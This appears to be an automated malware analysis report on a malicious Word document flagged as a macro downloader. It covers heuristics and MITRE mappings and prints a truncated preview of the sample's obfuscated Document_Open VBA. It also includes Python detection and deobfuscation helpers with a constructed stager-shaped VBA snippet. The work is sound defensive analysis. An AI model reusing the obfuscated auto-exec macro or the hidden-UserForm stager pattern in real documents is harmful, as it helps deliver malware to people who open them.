Verdict: MALICIOUS
Risk Score: 302

Malware Insights

MITRE ATT&CK:
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1566.001 Phishing: Spearphishing Attachment
The sample contains VBA macros, including a Document_Open auto-exec macro and a hidden-UserForm command stager, a shape characteristic of a macro downloader. The obfuscated VBA and the CreateObject/GetObject heuristics indicate that it instantiates a COM object at runtime to execute a payload. The ClamAV detection (Doc.Downloader.Sagent-7459479-0) corroborates the verdict.
Heuristics (8)

- ClamAV: Doc.Downloader.Sagent-7459479-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Sagent-7459479-0
- VBA macros detected (medium, OLE_VBA_MACROS; 5 related findings): Document contains VBA macro code
- VBA UserForm hidden-property command stager (critical, OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER): A VBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive.
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call
- GetObject call (high, OLE_VBA_GETOBJ): GetObject call
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): The compiled VBA (p-code) or cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only documents, and documents where source extraction fails, so that macros are still flagged when readable source is unavailable.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body). This is the DrawingML XML namespace that Office writes into ordinary documents, so it is expected content rather than an indicator.
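The stager heuristic above is a conjunction of three conditions: an auto-exec entry point, a CreateObject/GetObject whose argument is a variable rather than a string literal, and string assembly through Split/Join or hidden UserForm properties. As an added example (not the analyzer's own code), the following stdlib-only Python reconstructs those conditions and runs them over decoded VBA source, which is what olevba hands you. The regexes are my reading of the rule descriptions, not the scanner's signatures, and both VBA snippets are constructed for illustration; nothing here is the sample's decoded command. It only covers the decoded-source case, so it does not replace the p-code heuristic, which works on the compiled stream instead.

```python
import re

# Heuristic patterns reconstructed from the report's rule descriptions.
# They are illustrative, not the scanner's own signatures.
AUTOEXEC_RE = re.compile(
    r"\b(?:Sub|Function)\s+(?:Document_Open|AutoOpen|Auto_Open|Workbook_Open|AutoExec)\b",
    re.I)
DOCOPEN_RE = re.compile(r"\bSub\s+Document_Open\b", re.I)
CREATEOBJ_RE = re.compile(r"\bCreateObject\s*\(", re.I)
GETOBJ_RE = re.compile(r"\bGetObject\s*\(", re.I)
# CreateObject/GetObject whose first argument is NOT a string literal: the
# ProgID or moniker arrives in a variable that was decoded at runtime.
COM_FROM_VAR_RE = re.compile(r"\b(?:CreateObject|GetObject)\s*\((?!\s*\")", re.I)
# UserForm properties that hold text without ever being displayed.
HIDDEN_PROP_RE = re.compile(r"\.(?:ControlTipText|Tag|Pages|HelpContextId)\b", re.I)
SPLIT_JOIN_RE = re.compile(r"\b(?:Split|Join)\s*\(", re.I)


def scan_vba(src):
    """Return {heuristic_id: severity} for one decoded VBA source text."""
    findings = {}
    if DOCOPEN_RE.search(src):
        findings["OLE_VBA_DOCOPEN"] = "high"
    if CREATEOBJ_RE.search(src):
        findings["OLE_VBA_CREATEOBJ"] = "high"
    if GETOBJ_RE.search(src):
        findings["OLE_VBA_GETOBJ"] = "high"
    # The stager rule needs all three legs: auto-exec + COM object from a
    # variable + command text rebuilt from hidden properties or Split/Join.
    stager = (AUTOEXEC_RE.search(src)
              and COM_FROM_VAR_RE.search(src)
              and (HIDDEN_PROP_RE.search(src) or SPLIT_JOIN_RE.search(src)))
    if stager:
        findings["OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER"] = "critical"
    return findings


# Constructed VBA in the stager shape (hypothetical form/control names).
STAGER_SAMPLE = """\
Private Sub Document_Open()
    Dim progid As String, cmd As String
    progid = Join(Split(UserForm1.Tag, "|"), "")
    cmd = Join(Split(UserForm1.Label1.ControlTipText, "#"), "")
    Set shell = CreateObject(progid)
    shell.Run cmd
End Sub
"""

# Constructed benign-looking macro: auto-exec and CreateObject are present,
# but the ProgID is a literal and nothing is assembled from form properties.
BENIGN_SAMPLE = """\
Sub AutoOpen()
    Set fso = CreateObject("Scripting.FileSystemObject")
    MsgBox fso.GetBaseName(ActiveDocument.FullName)
End Sub
"""

if __name__ == "__main__":
    for name, src in (("stager", STAGER_SAMPLE), ("benign", BENIGN_SAMPLE)):
        print(name, scan_vba(src))
```

The benign sample still trips OLE_VBA_CREATEOBJ, which is why that heuristic is only "high" on its own; the literal ProgID is what keeps the critical stager rule from firing.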
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7873 bytes |

SHA-256 (macros.bas): 58085ffc8dda8658cf2976dae71911dfbac4ca186479b529254b09e24e03575f
Preview script (first 1,000 lines of the extracted script):

```vb
Attribute VB_Name = "Wlohmbxf"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Nsboizdpzuiyq, 0, 0, MSForms, TextBox"
Private Sub Document_open()
Dim Errfilzinaklg, Lwhnnpkev
For Lnikmigtx = Pwgpawccpm To Zlwcfitnw
Zlacncem = Agkgxonbtvuu
Zqfbldaput = Hex(Atpzkzyp)
Lwhtglczi = Chr(Qdxxdaprl)
Ytntmuluwqk = Jurwomvlc - Qsbhyixntu
Gnzionjpfjs = Jscyqfwvdc
Ewnsxblmgljp = Hex(Xtiehanxp)
Ocoarckfqkrv = Int(Hhbcxjnuj)
Next
Dim Vgcvdnhgr, Skttvegl
For Bekzffuefogg = Emwoaxjxhesoh To Wgkkmtcs
Inbmotlrwpjis = Mexghqxve
Wwfdctaqs = Hex(Lskgwlkrn)
Capelohkrxdgx = Chr(Tmpicsxete)
Tmlmvtwu = Xhljhskimmr - Xbfmgevvapnn
Kinavgeph = Lfuksjjiunkp
Pjsxsywjlza = Hex(Wenhujtvzb)
Gdedszsgk = Int(Mrpywbtuktxnd)
Next
Dim Chrzelxnnse, Xrbpfoyczynlv
For Aivdkcjnz = Pimplmuit To Xveylcjdoiiqn
Bfuodbnyyppkm = Nkdblzzmrge
Xhszkplonf = Hex(Jwfjwswcxvxml)
Btdhzfabrwpzx = Chr(Zfddbctc)
Itpcjgnrsju = Brivnmgsymuvs - Rtiqhsrml
Qchfghohb = Hgqpvjgugrwf
Becfkexwfwelt = Hex(Gkhvymcaswi)
Srtwhhfdmcr = Int(Katkkpahzgpk)
Next
Llyitqjc
End Sub
Attribute VB_Name = "Easpwgcbwkfj"
Attribute VB_Base = "0{44E853AD-C495-4EDA-A1F7-CAABD72FB8C8}{E0F90029-5277-45CC-9E55-529C6D30D26B}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Xzzkpmgfgfh"
Function Qxqzlskyh()
Dim Flnmephmida, Rpvipiing
For Kzsipifxru = Yrvfqelhrr To Zzgbvwbzya
Wzwaxdfle = Rudsjufvtegip
Bvsnnxpq = Hex(Hkjoljhwcog)
Setfiaqq = Chr(Tbksqpzcdubbk)
Hvymnnxir = Usgqrazmqn - Rhcmdybquxy
Setlwstsh = Vncbcxftg
Elaukpjpx = Hex(Kzwgatuhy)
Uqpvaowreta = Int(Ikcidjrwnqccf)
Next
Jxcafeormlc = Wlohmbxf.Nsboizdpzuiyq
Dim Tbiwtelusjrac, Hqewtoenpn
For Vrqbvdslyb = Sigbsspnseyyo To Lpntirrqdbhvx
Lfdfekidvwxou = Smaghvkiehas
Kwsduttujqncm = Hex(Kcxakjvvrccax)
Esfdkafkzxzxd = Chr(Ejrltfcssqpa)
Ssvvlmux = Weryckmrm - Sjlfsbamnuzej
Ebrwygajp = Ephdxoddzjj
Kukvnwahrygk = Hex(Arszvqexkfj)
Bggvukxmdv = Int(Sogmrasxzclhj)
Next
Tmiypvnrxz = Jxcafeormlc + Easpwgcbwkfj.Ypjhiucujt + Easpwgcbwkfj.Jrbmjczvhlzqa + Easpwgcbwkfj.Rvbofqebud
Dim Mskfqyfosfgfv, Ycpxqfpzqyi
For Tckykolzqlkwk = Aekkcgebp To Qwtugiuhv
Hugbqirfbguh = Nxbspbubfy
Webcdqrfw = Hex(Apvjjvzw)
Itksogoagpim = Chr(Ndydeqtpxt)
Tskffbak = Rjojceqzvo - Vfxvsybtvq
Nwqakgmayc = Punoyxymyjw
Jjbjuoarbw = Hex(Ppoceltthgx)
Uysfodalra = Int(Qdnmxnxhai)
Next
Nfpcgefp = Tmiypvnrxz + Easpwgcbwkfj.Shbuwtgaarlzq + Easpwgcbwkfj.Qxvpaqknzamz
Dim Hchtgvtdha, Vcobypcoqzuz
For Jiqyfvgsuudym = Lqetqqjwma To Evhihghmknj
Nchtxacf = Jpgwizmdx
Cwmmvsekb = Hex(Iqdocdoai)
Qysbkzmy = Chr(Bukfvhbhyu)
Cgpsuxiox = Agouuifycpuhw - Gwnsjnzkv
Reopupovjz = Hzswyqizsz
Mbeclavsiir = Hex(Mvftbiizjf)
Raunmtrsxds = Int(Jieoezismm)
Next
Qxqzlskyh = Ynmrjwhfd + Nfpcgefp + Ynmrjwhfd
Dim Mfcgcjrab, Ocyborwj
For Smntxaxcbuwy = Wrjkqafjatrzs To Fytvnutpnei
Zleqvzewhmsrn = Tbyhxovvcc
Dcwghhhj = Hex(Besusxmbezl)
Mfbvjdqcnbwbt = Chr(Ljgzyezup)
Yibxurwgjagmy = Modwtylhputmi - Lmsnfibqgef
Efxiuasl = Kymaldbfnpwp
Kzplywrnkjdk = Hex(Rizcttipth)
Fysyfokdxu = Int(Muawncxbg)
Next
End Function
Function Llyitqjc()
Dim Inwlkbrbmtnu, Gwbshyhbxa
For Whnllphoprax = Yvvkpndulzoi To Mgqvlrekob
Nqvowecoz
```
... (truncated)
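The preview makes the obfuscation shape visible: every live statement is padded with For/Next loops over never-defined names whose Hex/Chr/Int results are never read, and the real work is a chain of concatenations of control and property values from the Wlohmbxf module (the ThisDocument TextBox declared in VB_Control) and the Easpwgcbwkfj UserForm module. As an added triage helper, not part of the report or of the analyzer, the following Python strips loops whose assignments are never read outside them, drops the orphaned Dim lines, and lists the module.member references that remain, which are the form values an analyst needs to dump before the string can be reassembled. The input is a constructed excerpt modelled on Qxqzlskyh above with the loop bodies shortened; the reduced output says nothing about what the command decodes to on this sample, which the page does not show.

```python
import re

FOR_RE = re.compile(r"^\s*For\s+\w+\s*=", re.I)
NEXT_RE = re.compile(r"^\s*Next\b", re.I)
ASSIGN_RE = re.compile(r"^\s*(?:Set\s+)?(\w+)\s*=", re.I)
DIM_RE = re.compile(r"^\s*Dim\s+(.+?)\s*$", re.I)
IDENT_RE = re.compile(r"\b[A-Za-z_]\w*\b")
MEMBER_RE = re.compile(r"\b([A-Za-z_]\w*)\.([A-Za-z_]\w*)\b")


def _loop_ranges(lines):
    """Yield (start, end) line indexes of each For ... Next block."""
    ranges, stack = [], []
    for i, line in enumerate(lines):
        if FOR_RE.match(line):
            stack.append(i)
        elif NEXT_RE.match(line) and stack:
            ranges.append((stack.pop(), i))
    return ranges


def strip_junk(src):
    """Remove filler loops and unused Dim lines from decoded VBA source.

    A loop is junk when none of the variables assigned inside it is
    referenced anywhere outside it; a Dim line is junk when none of the
    names it declares appears in the surviving code."""
    lines = src.splitlines()
    dead = set()
    for start, end in _loop_ranges(lines):
        assigned = {m.group(1).lower()
                    for m in (ASSIGN_RE.match(l) for l in lines[start + 1:end]) if m}
        outside = " ".join(l for i, l in enumerate(lines) if i < start or i > end)
        used_outside = {t.lower() for t in IDENT_RE.findall(outside)}
        if not (assigned & used_outside):
            dead.update(range(start, end + 1))
    kept = [l for i, l in enumerate(lines) if i not in dead]
    body_tokens = {t.lower() for l in kept if not DIM_RE.match(l)
                   for t in IDENT_RE.findall(l)}
    result = []
    for l in kept:
        m = DIM_RE.match(l)
        if m:
            names = [n.strip().split()[0].lower() for n in m.group(1).split(",")]
            if not any(n in body_tokens for n in names):
                continue
        result.append(l)
    return "\n".join(result)


def form_references(src):
    """Sorted Module.Member references left after junk removal: the form
    controls and properties whose stored values feed the string assembly."""
    reduced = strip_junk(src)
    return sorted({f"{mod}.{mem}" for mod, mem in MEMBER_RE.findall(reduced)})


# Constructed excerpt modelled on the Qxqzlskyh function in the preview
# (loop bodies shortened); not the full extracted macro.
SAMPLE_VBA = """\
Function Qxqzlskyh()
Dim Flnmephmida, Rpvipiing
For Kzsipifxru = Yrvfqelhrr To Zzgbvwbzya
Wzwaxdfle = Rudsjufvtegip
Bvsnnxpq = Hex(Hkjoljhwcog)
Setfiaqq = Chr(Tbksqpzcdubbk)
Hvymnnxir = Usgqrazmqn - Rhcmdybquxy
Next
Jxcafeormlc = Wlohmbxf.Nsboizdpzuiyq
Dim Tbiwtelusjrac, Hqewtoenpn
For Vrqbvdslyb = Sigbsspnseyyo To Lpntirrqdbhvx
Lfdfekidvwxou = Smaghvkiehas
Kwsduttujqncm = Hex(Kcxakjvvrccax)
Next
Tmiypvnrxz = Jxcafeormlc + Easpwgcbwkfj.Ypjhiucujt + Easpwgcbwkfj.Jrbmjczvhlzqa + Easpwgcbwkfj.Rvbofqebud
Nfpcgefp = Tmiypvnrxz + Easpwgcbwkfj.Shbuwtgaarlzq + Easpwgcbwkfj.Qxvpaqknzamz
Qxqzlskyh = Ynmrjwhfd + Nfpcgefp + Ynmrjwhfd
End Function
"""

if __name__ == "__main__":
    print(strip_junk(SAMPLE_VBA))
    print(form_references(SAMPLE_VBA))
```

Run against the carved macros.bas, the reduced source is what to read, and the listed members are the control and property values to pull from the UserForm's o stream (olevba reports these as form strings) before reassembling the string passed to the COM object.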